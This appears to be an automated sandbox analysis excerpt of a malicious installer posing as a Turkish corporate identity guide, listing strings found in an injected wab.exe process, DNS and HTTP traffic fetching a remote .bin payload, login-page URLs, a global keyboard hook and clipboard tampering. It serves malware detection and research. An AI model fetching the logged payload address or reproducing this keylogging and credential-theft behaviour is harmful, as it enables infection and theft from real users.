              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: wab.exe, 00000007.00000003.36577115530.0000000006B02000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B2A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745429732.0000000006B03000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_f
              Source: wab.exe, 00000007.00000002.37746447305.0000000006D20000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.37746447305.0000000006D20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binSkorFiltathirchimie.com/IogvoayYhe139.bin
              Source: DHRI_kurumsal kimlik rehberi-2023.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhvBEC4.tmp.10.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000C.00000002.35549985519.0000000002DAC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/8r
              Source: wab.exe, 0000000C.00000002.35550707145.00000000037DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.37758609179.00000000374A0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 0000000A.00000002.35581482185.0000000000336000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575493602.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576455750.000000000468A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575056619.0000000004689000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35576603084.000000000468A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573483184.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.med
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.medi
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/check
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checks
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lif
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync
              Source: wab.exe, 0000000A.00000003.35569834685.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eb2.3lift.com/sync?
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get.a
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://get3.adobe.co
              Source: wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagea
              Source: wab.exe, 0000000A.00000003.35571449811.0000000004D99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211
              Source: wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572407435.000000000467D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580384165.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572694606.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572506007.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/drt/s?v=r20120211https://googleads.g.doubleclick.net/page
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ib.adnxs.com/async_usersync_file
              Source: wab.exe, 0000000A.00000002.35581482185.0000000000336000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35581482185.0000000000332000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35582603347.0000000004DAD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
              Source: wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580486755.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580435804.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35569834685.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571135364.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571010327.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580683985.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570898773.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.000000000466F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571193180.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571073665.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 0000000A.00000003.35572407435.000000000467D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570967770.000000000467D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 0000000A.00000003.35569904739.0000000004680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 0000000A.00000002.35582481202.0000000004688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: wab.exe, 0000000A.00000003.35571324117.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572447017.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571517195.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571582284.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580486755.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580435804.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571702365.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571135364.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572343715.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571387430.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572565404.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571010327.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580683985.000000000466C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572627710.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35570898773.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580784486.000000000466F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571193180.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571824908.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571073665.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35580330134.000000000466C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571642671.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571761891.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35571888637.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572694606.0000000004D96000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35572506007.0000000004D96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: wab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.g
              Source: wab.exe, 0000000A.00000003.35579175808.0000000004683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: wab.exe, 0000000A.00000002.35582571541.0000000004D90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.adobe.cb
              Source: wab.exe, wab.exe, 0000000C.00000002.35549632170.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/https://
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pa
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/pagead/drt/ui
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=ie
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
              Source: wab.exe, 0000000A.00000003.35569619278.0000000004671000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/https://
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/https://www.msn.com/de-c
              Source: bhvBEC4.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
              Source: wab.exe, 0000000A.00000003.35575331728.000000000467C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.35575295495.000000000467C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ientp
              Source: wab.exe, 0000000A.00000003.35573574777.0000000004671000.00000004.00000020.00020000.00000000.sdmp, bhvBEC4.tmp.10.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
              Source: unknownDNS traffic detected: queries for: gudanidevelopment.ge
              Source: global trafficHTTP traffic detected: GET /IogvoayYhe139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: gudanidevelopment.geCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
              Contains functionality to modify clipboard data
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,10_2_0040987A
